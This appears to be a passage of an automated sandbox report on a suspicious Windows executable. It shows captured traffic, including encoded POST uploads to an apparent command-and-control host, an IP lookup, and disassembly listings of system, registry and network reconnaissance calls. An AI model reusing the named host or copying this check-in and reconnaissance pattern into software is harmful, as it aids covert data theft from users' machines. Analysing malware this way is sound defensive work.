                                                            Data Ascii: jqtPHykqVOFapKMHSorN0fVbXW9LsNXsixtNRtorq3LDDGOVdy5H9e4571pV\/WdOpCrCFWnJTp1IRqU5xd4zhNKUZRfVSi00+qZ\/E7p1KNSrRqwlTqUpyp1KclaUKkJOM4yXSUZJpro0FRP1\/D+pqO9uo7Gzu72b\/VWdtPdS9v3dvE8r8np8qHmtnxtp2j+DfBes+Kn+Kfwe8Sa74S+DPwk\/aG8efCfw3rnxGHxS8DfBj4
                                                            Dec 28, 2024 09:53:32.480846882 CET2472OUTData Raw: 6a 72 6c 31 4a 65 50 70 58 69 66 53 62 45 34 76 74 55 75 6c 74 30 68 73 6f 6a 46 61 72 42 46 4b 39 78 4c 48 4a 63 53 2b 72 48 5c 2f 67 75 44 2b 30 56 5c 2f 44 38 4a 76 67 63 50 72 59 5c 2f 45 46 76 35 65 50 56 72 38 5a 50 41 52 38 4e 2b 4c 66 44
                                                            Data Ascii: jrl1JePpXifSbE4vtUult0hsojFarBFK9xLHJcS+rH\/guD+0V\/D8JvgcPrY\/EFv5ePVr8ZPAR8N+LfD3h7xX4u+LPwZ+BujeOPEmr+F\/htdfGLxD8QYB8Srzw3ejSfFGseFYvhh8LPilc2Pgnw3rMsGi6n8RPHEHg3wFJq7X+mab4k1C\/8N+LbbQMbw9NNrXhDwb8RNQ1fwL4V+HXij4X\/ABB+MGsfEHxD4j1\/\/hEfh
                                                            Dec 28, 2024 09:53:32.480861902 CET2472OUTData Raw: 70 5c 2f 54 32 71 43 54 39 34 71 4a 39 39 7a 6a 7a 66 72 2b 66 70 56 72 2b 4d 5c 2f 4a 76 36 65 76 70 5c 2f 6e 6e 2b 6c 51 66 49 57 51 66 36 37 79 5c 2f 2b 32 41 5c 2f 34 39 66 79 5c 2f 6e 2b 6c 42 30 6c 59 62 34 5c 2f 38 41 6c 6a 76 50 50 2b 66
                                                            Data Ascii: p\/T2qCT94qJ99zjzfr+fpVr+M\/Jv6evp\/nn+lQfIWQf67y\/+2A\/49fy\/n+lB0lYb4\/8AljvPP+f84\/nmHa\/yb0+T\/Pv\/AJ\/lZk2f3Ouf+WvTp0qt93Y6\/f8ANuOnHnfhWntPL8f+Aaw2+f6Ihbfu+T5P+ufb\/D0p8kn7vYif6v8A5af5+n9Og5kO\/wAzZy\/2f+\/+H41V3bf4\/nHHX\/ya\/wA+v4VoWPL
                                                            Dec 28, 2024 09:53:33.598784924 CET212INHTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.64972681.29.149.125805260C:\Users\user\Desktop\ZFttiy4Tt8.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 28, 2024 09:53:34.575469017 CET284OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                            Host: home.fiveth5ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 143
                                                            Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                            Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                            Dec 28, 2024 09:53:35.843194008 CET212INHTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.6497173.218.7.1034435260C:\Users\user\Desktop\ZFttiy4Tt8.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-28 08:53:29 UTC52OUTGET /ip HTTP/1.1
                                                            Host: httpbin.org
                                                            Accept: */*
                                                            2024-12-28 08:53:29 UTC224INHTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 08:53:29 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Connection: close
                                                            Server: gunicorn/19.9.0
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: true
                                                            2024-12-28 08:53:29 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                            Data Ascii: { "origin": "8.46.123.189"}


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            System Behavior

                                                            General

                                                            Target ID:2
                                                            Start time:03:53:24
                                                            Start date:28/12/2024
                                                            Path:C:\Users\user\Desktop\ZFttiy4Tt8.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\ZFttiy4Tt8.exe"
                                                            Imagebase:0xdf0000
                                                            File size:4'528'640 bytes
                                                            MD5 hash:8CB06B0904107A21706822F2F2D90832
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:2.3%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:18.6%
                                                              Total number of Nodes:247
                                                              Total number of Limit Nodes:37
                                                              execution_graph 62812 e0d5e0 62813 e0d652 WSAStartup 62812->62813 62814 e0d5f0 62812->62814 62813->62814 62941 df29ff FindFirstFileA 62942 df2a31 62941->62942 62943 df2a5c RegOpenKeyExA 62942->62943 62944 df2a93 62943->62944 62945 df2ade CharUpperA 62944->62945 62947 df2b0a 62945->62947 62946 df2bf9 QueryFullProcessImageNameA 62948 df2c3b CloseHandle 62946->62948 62947->62946 62950 df2c64 62948->62950 62949 df2df1 CloseHandle 62951 df2e23 62949->62951 62950->62949 62815 df3d5e 62816 df3d30 62815->62816 62816->62815 62817 df3d90 62816->62817 62819 e00ab0 62816->62819 62822 e005b0 62819->62822 62821 e00acd 62821->62816 62823 e007c7 62822->62823 62824 e005bd 62822->62824 62823->62821 62824->62823 62825 e007ef 62824->62825 62826 e00707 WSAEventSelect 62824->62826 62836 df76a0 62824->62836 62825->62823 62831 e00847 62825->62831 62832 e06fa0 62825->62832 62826->62823 62826->62824 62829 e009e8 WSAEnumNetworkEvents 62830 e009d0 WSAEventSelect 62829->62830 62829->62831 62830->62829 62830->62831 62831->62823 62831->62829 62831->62830 62834 e06fd4 62832->62834 62835 e06feb 62832->62835 62833 e07207 select 62833->62835 62834->62833 62834->62835 62835->62831 62837 df76e6 send 62836->62837 62838 df76c0 62836->62838 62839 df76c9 62837->62839 62838->62837 62838->62839 62839->62824 62840 df255d 62841 1179f70 62840->62841 62842 df256c GetSystemInfo 62841->62842 62843 df2589 62842->62843 62844 df25a0 GlobalMemoryStatusEx 62843->62844 62849 df25ec 62844->62849 62845 df263c GetDriveTypeA 62847 df2655 GetDiskFreeSpaceExA 62845->62847 62845->62849 62846 df2762 62848 df27d6 KiUserCallbackDispatcher 62846->62848 62847->62849 62850 df27f8 62848->62850 62849->62845 62849->62846 62851 df28d9 FindFirstFileW 62850->62851 62852 df2906 FindNextFileW 62851->62852 62853 df2928 62851->62853 62852->62852 62852->62853 62952 e2b3c0 62953 e2b3cb 62952->62953 62954 e2b3ee 62952->62954 62957 df76a0 send 62953->62957 62958 e29290 62953->62958 62955 e2b3ea 62957->62955 62959 df76a0 send 62958->62959 62960 e292e5 62959->62960 62961 e29392 62960->62961 62962 e29335 WSAIoctl 62960->62962 62961->62955 62962->62961 62963 e29366 62962->62963 62963->62961 62964 e29371 setsockopt 62963->62964 62964->62961 62965 e2e400 62967 e2e412 62965->62967 62968 e2e459 62965->62968 62969 e268b0 closesocket 62967->62969 62969->62968 62970 e2b400 62971 e2b425 62970->62971 62972 e2b40b 62970->62972 62975 df7770 62972->62975 62973 e2b421 62976 df77b6 recv 62975->62976 62977 df7790 62975->62977 62978 df7799 62976->62978 62977->62976 62977->62978 62978->62973 62854 df31d7 62857 df31f4 62854->62857 62855 df32dc CloseHandle 62856 df3200 62855->62856 62857->62855 62857->62856 62858 df2f17 62866 df2f2c 62858->62866 62859 df31d3 62860 df2fb3 RegOpenKeyExA 62860->62866 62861 df315c RegEnumKeyExA 62862 df31b2 RegCloseKey 62861->62862 62861->62866 62862->62866 62863 df3046 RegOpenKeyExA 62864 df3089 RegQueryValueExA 62863->62864 62863->62866 62865 df313b RegCloseKey 62864->62865 62864->62866 62865->62866 62866->62859 62866->62860 62866->62861 62866->62863 62866->62865 62867 ea4720 62871 ea4728 62867->62871 62868 ea4733 62870 ea4774 62871->62868 62876 ea476c 62871->62876 62877 ea9270 62871->62877 62873 ea4860 62880 ea4950 62873->62880 62875 ea4878 62876->62875 62884 ea30a0 closesocket 62876->62884 62885 eaa440 62877->62885 62879 ea9297 62879->62873 62883 ea4966 62880->62883 62881 ea49c5 62881->62876 62882 ea4aa0 gethostname 62882->62881 62882->62883 62883->62881 62883->62882 62884->62870 62912 eaa46b 62885->62912 62886 eaaa03 RegOpenKeyExA 62887 eaab70 RegOpenKeyExA 62886->62887 62888 eaaa27 RegQueryValueExA 62886->62888 62891 eaac34 RegOpenKeyExA 62887->62891 62908 eaab90 62887->62908 62889 eaaacc RegQueryValueExA 62888->62889 62890 eaaa71 62888->62890 62893 eaab0e 62889->62893 62894 eaab66 RegCloseKey 62889->62894 62890->62889 62897 eaaa85 RegQueryValueExA 62890->62897 62892 eaacf8 RegOpenKeyExA 62891->62892 62910 eaac54 62891->62910 62895 eaad56 RegEnumKeyExA 62892->62895 62899 eaad14 62892->62899 62893->62894 62898 eaab1e RegQueryValueExA 62893->62898 62894->62887 62896 eaad9b 62895->62896 62895->62899 62900 eaae16 RegOpenKeyExA 62896->62900 62901 eaaab3 62897->62901 62904 eaab4c 62898->62904 62899->62879 62902 eaaddf RegEnumKeyExA 62900->62902 62903 eaae34 RegQueryValueExA 62900->62903 62901->62889 62902->62899 62902->62900 62905 eaaf43 RegQueryValueExA 62903->62905 62915 eaadaa 62903->62915 62904->62894 62906 eab052 RegQueryValueExA 62905->62906 62905->62915 62907 eaadc7 RegCloseKey 62906->62907 62906->62915 62907->62902 62908->62891 62909 eaafa0 RegQueryValueExA 62909->62915 62910->62892 62911 eaa794 GetBestRoute2 62911->62912 62912->62911 62913 eaa4db 62912->62913 62914 eaa6c7 GetBestRoute2 62912->62914 62913->62886 62913->62899 62914->62912 62915->62905 62915->62906 62915->62907 62915->62909 62979 ebb180 62982 ebb19b 62979->62982 62986 ebb2e3 62979->62986 62983 ebb2a9 getsockname 62982->62983 62985 ebb020 closesocket 62982->62985 62982->62986 62987 ebaf30 62982->62987 62991 ebb060 62982->62991 62996 ebb020 62983->62996 62985->62982 62988 ebaf4c 62987->62988 62989 ebaf63 socket 62987->62989 62988->62989 62990 ebaf52 62988->62990 62989->62982 62990->62982 62995 ebb080 62991->62995 62992 ebb0b0 connect 62993 ebb0bf WSAGetLastError 62992->62993 62994 ebb0ea 62993->62994 62993->62995 62994->62982 62995->62992 62995->62993 62995->62994 62997 ebb029 62996->62997 62998 ebb052 62996->62998 62999 ebb04b closesocket 62997->62999 63000 ebb03e 62997->63000 62998->62982 62999->62998 63000->62982 63001 eba080 63004 eb9740 63001->63004 63003 eba09b 63005 eb9780 63004->63005 63009 eb975d 63004->63009 63006 eb9925 RegOpenKeyExA 63005->63006 63005->63009 63007 eb995a RegQueryValueExA 63006->63007 63006->63009 63008 eb9986 RegCloseKey 63007->63008 63008->63009 63009->63003 62916 e295b0 62917 e295c8 62916->62917 62919 e295fd 62916->62919 62917->62919 62920 e2a150 62917->62920 62921 e2a15f 62920->62921 62923 e2a1d0 62920->62923 62922 e2a181 getsockname 62921->62922 62921->62923 62922->62923 62923->62919 63010 e28b50 63011 e28b6b 63010->63011 63029 e28bb5 63010->63029 63012 e28bf3 63011->63012 63013 e28b8f 63011->63013 63011->63029 63030 e2a550 63012->63030 63045 e06e40 select 63013->63045 63016 e28bfc 63020 e28c35 63016->63020 63021 e28c1f connect 63016->63021 63027 e28cb2 63016->63027 63016->63029 63017 e28cd9 SleepEx getsockopt 63018 e28d18 63017->63018 63022 e28d43 63018->63022 63018->63027 63019 e2a150 getsockname 63026 e28dff 63019->63026 63024 e2a150 getsockname 63020->63024 63021->63020 63025 e2a150 getsockname 63022->63025 63028 e28ba1 63024->63028 63025->63029 63026->63029 63046 df78b0 closesocket 63026->63046 63027->63019 63027->63026 63027->63029 63028->63017 63028->63027 63028->63029 63031 e2a575 63030->63031 63035 e2a597 63031->63035 63048 df75e0 63031->63048 63033 df78b0 closesocket 63034 e2a713 63033->63034 63034->63016 63036 e2a811 setsockopt 63035->63036 63041 e2a83b 63035->63041 63043 e2a69b 63035->63043 63036->63041 63038 e2af56 63039 e2af5d 63038->63039 63038->63043 63039->63034 63040 e2a150 getsockname 63039->63040 63040->63034 63041->63043 63044 e2abe1 63041->63044 63054 e26be0 select closesocket 63041->63054 63043->63033 63043->63034 63044->63043 63053 e567e0 ioctlsocket 63044->63053 63045->63028 63047 df78c5 63046->63047 63047->63029 63049 df75ef 63048->63049 63050 df7607 socket 63048->63050 63049->63050 63052 df7643 63049->63052 63051 df762b 63050->63051 63051->63035 63052->63035 63053->63038 63054->63044 62924 df13c9 62926 df1160 62924->62926 62927 df13a1 62926->62927 62928 1178a20 _lock 62926->62928 62928->62926 62929 1277830 62930 127785a 62929->62930 62931 1277866 62930->62931 62932 1277950 62930->62932 62934 1277906 62930->62934 62938 117b500 _lock 62932->62938 62933 1277944 62934->62933 62939 117b500 _lock 62934->62939 62936 1277979 62938->62936 62939->62936 62940 117b180 Sleep 63055 ea5a50 63056 ea5a58 63055->63056 63060 ea5ea0 63055->63060 63057 ea5b50 63056->63057 63066 ea5a99 63056->63066 63070 ea5b88 63056->63070 63061 ea5b7a 63057->63061 63062 ea5eb4 63057->63062 63057->63070 63058 ea5e96 63085 eb9480 closesocket 63058->63085 63076 ea70a0 63061->63076 63086 ea6f10 socket ioctlsocket connect getsockname closesocket 63062->63086 63065 ea5ec2 63065->63065 63069 ea70a0 6 API calls 63066->63069 63066->63070 63083 ea6f10 socket ioctlsocket connect getsockname closesocket 63066->63083 63069->63066 63070->63058 63072 eba920 63070->63072 63084 eb9320 closesocket 63070->63084 63073 eba944 63072->63073 63074 eba94b 63073->63074 63075 eba977 send 63073->63075 63074->63070 63075->63070 63077 ea70ae 63076->63077 63079 ea717f 63077->63079 63082 ea71a7 63077->63082 63087 eba8c0 63077->63087 63091 ea71c0 socket ioctlsocket connect getsockname 63077->63091 63079->63082 63092 eb9320 closesocket 63079->63092 63082->63070 63083->63066 63084->63070 63085->63060 63086->63065 63088 eba903 recvfrom 63087->63088 63089 eba8e6 63087->63089 63090 eba8ed 63088->63090 63089->63088 63089->63090 63090->63077 63091->63077 63092->63082

                                                              Executed Functions

                                                              Function 00E2F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                              • API String ID: 0-1590685507
                                                              • Opcode ID: 43660dd911230de6862133aae0a0d80662ac07a2e7967b37b3f4affc35b0fbe9
                                                              • Instruction ID: cc5d94b69df1f12606e83bc36b38980fb6bb5b6a5ad21f11053cc7f66e3f6e2b
                                                              • Opcode Fuzzy Hash: 43660dd911230de6862133aae0a0d80662ac07a2e7967b37b3f4affc35b0fbe9
                                                              • Instruction Fuzzy Hash: E2C2AF31A043549FD724CF28D484B6ABBF1BF84318F05967DEC99AB262D771E984CB81
                                                              Function 00DF255D Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 282fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSystemInfo.KERNELBASE ref: 00DF2579
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 00DF25CC
                                                              • GetDriveTypeA.KERNELBASE ref: 00DF2647
                                                              • GetDiskFreeSpaceExA.KERNELBASE ref: 00DF267E
                                                              • KiUserCallbackDispatcher.NTDLL ref: 00DF27E2
                                                              • FindFirstFileW.KERNELBASE ref: 00DF28F8
                                                              • FindNextFileW.KERNELBASE ref: 00DF291F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                              • String ID: @$`
                                                              • API String ID: 3271271169-3318628307
                                                              • Opcode ID: 17626b54f7487ad7417b36b2d7eac638171a5aa290488ea674f1774cdc065c23
                                                              • Instruction ID: 2e11fe09b98a01799cc1af31bab1184c7387e43c91d58c618df196c21fce310f
                                                              • Opcode Fuzzy Hash: 17626b54f7487ad7417b36b2d7eac638171a5aa290488ea674f1774cdc065c23
                                                              • Instruction Fuzzy Hash: 0ED1C3B49093199FDB50EF68C5846AEBBF4BF48354F00896DE898D7314E7349A84CF92
                                                              Function 00DF29FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1362 df29ff-df2a2f FindFirstFileA 1363 df2a38 1362->1363 1364 df2a31-df2a36 1362->1364 1365 df2a3d-df2a91 call 1279c50 call 1279ce0 RegOpenKeyExA 1363->1365 1364->1365 1370 df2a9a 1365->1370 1371 df2a93-df2a98 1365->1371 1372 df2a9f-df2b0c call 1279c50 call 1279ce0 CharUpperA call 1178da0 1370->1372 1371->1372 1380 df2b0e-df2b13 1372->1380 1381 df2b15 1372->1381 1382 df2b1a-df2b92 call 1279c50 call 1279ce0 call 1178e80 call 1178e70 1380->1382 1381->1382 1391 df2bcc-df2c66 QueryFullProcessImageNameA CloseHandle call 1178da0 1382->1391 1392 df2b94-df2ba3 1382->1392 1402 df2c6f 1391->1402 1403 df2c68-df2c6d 1391->1403 1395 df2ba5-df2bae 1392->1395 1396 df2bb0-df2bca call 1178e68 1392->1396 1395->1391 1396->1391 1396->1392 1404 df2c74-df2ce9 call 1279c50 call 1279ce0 call 1178e80 call 1178e70 1402->1404 1403->1404 1413 df2dcf-df2e1c call 1279c50 call 1279ce0 CloseHandle 1404->1413 1414 df2cef-df2d49 call 1178bb0 call 1178da0 1404->1414 1424 df2e23-df2e2e 1413->1424 1425 df2d4b-df2d63 call 1178da0 1414->1425 1426 df2d99-df2dad 1414->1426 1427 df2e37 1424->1427 1428 df2e30-df2e35 1424->1428 1425->1426 1435 df2d65-df2d7d call 1178da0 1425->1435 1426->1413 1430 df2e3c-df2ed6 call 1279c50 call 1279ce0 1427->1430 1428->1430 1443 df2eea 1430->1443 1444 df2ed8-df2ee1 1430->1444 1435->1426 1440 df2d7f-df2d97 call 1178da0 1435->1440 1440->1426 1448 df2daf-df2dc9 call 1178e68 1440->1448 1447 df2eef-df2f16 call 1279c50 call 1279ce0 1443->1447 1444->1443 1446 df2ee3-df2ee8 1444->1446 1446->1447 1448->1413 1448->1414
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                              • String ID: 0
                                                              • API String ID: 2406880114-4108050209
                                                              • Opcode ID: a61528ffe111a32258f1bdd14332862e66b27eefabf48d33a67d05200d2a625f
                                                              • Instruction ID: 6df2e75f40087e433905971712656ab7fc87dc6f93f65a50b1c4ad9b4eb6697e
                                                              • Opcode Fuzzy Hash: a61528ffe111a32258f1bdd14332862e66b27eefabf48d33a67d05200d2a625f
                                                              • Instruction Fuzzy Hash: B5E1FEB49043099FDB50EF68D5846AEBBF8BF44308F118869E998D7354E734D988CF52
                                                              Function 00E005B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1541 e005b0-e005b7 1542 e005bd-e005d4 1541->1542 1543 e007ee 1541->1543 1544 e007e7-e007ed 1542->1544 1545 e005da-e005e6 1542->1545 1544->1543 1545->1544 1546 e005ec-e005f0 1545->1546 1547 e005f6-e00620 call e07350 call df70b0 1546->1547 1548 e007c7-e007cc 1546->1548 1553 e00622-e00624 1547->1553 1554 e0066a-e0068c call e2dec0 1547->1554 1548->1544 1555 e00630-e00655 call df70d0 call e003c0 call e07450 1553->1555 1560 e00692-e006a0 1554->1560 1561 e007d6-e007e3 call e07380 1554->1561 1581 e0065b-e00668 call df70e0 1555->1581 1582 e007ce 1555->1582 1564 e006a2-e006a4 1560->1564 1565 e006f4-e006f6 1560->1565 1561->1544 1570 e006b0-e006e4 call e073b0 1564->1570 1567 e006fc-e006fe 1565->1567 1568 e007ef-e0082b call e03000 1565->1568 1573 e0072c-e00754 1567->1573 1585 e00831-e00837 1568->1585 1586 e00a2f-e00a35 1568->1586 1570->1561 1580 e006ea-e006ee 1570->1580 1577 e00756-e0075b 1573->1577 1578 e0075f-e0078b 1573->1578 1583 e00707-e00719 WSAEventSelect 1577->1583 1584 e0075d 1577->1584 1596 e00700-e00703 1578->1596 1597 e00791-e00796 1578->1597 1580->1570 1587 e006f0 1580->1587 1581->1554 1581->1555 1582->1561 1583->1561 1591 e0071f 1583->1591 1592 e00723-e00726 1584->1592 1594 e00861-e0087e 1585->1594 1595 e00839-e00842 call e06fa0 1585->1595 1588 e00a37-e00a3a 1586->1588 1589 e00a3c-e00a52 1586->1589 1587->1565 1588->1589 1589->1561 1599 e00a58-e00a81 call e02f10 1589->1599 1591->1592 1592->1568 1592->1573 1608 e00882-e0088d 1594->1608 1602 e00847-e0084c 1595->1602 1596->1583 1597->1596 1601 e0079c-e007c2 call df76a0 1597->1601 1599->1561 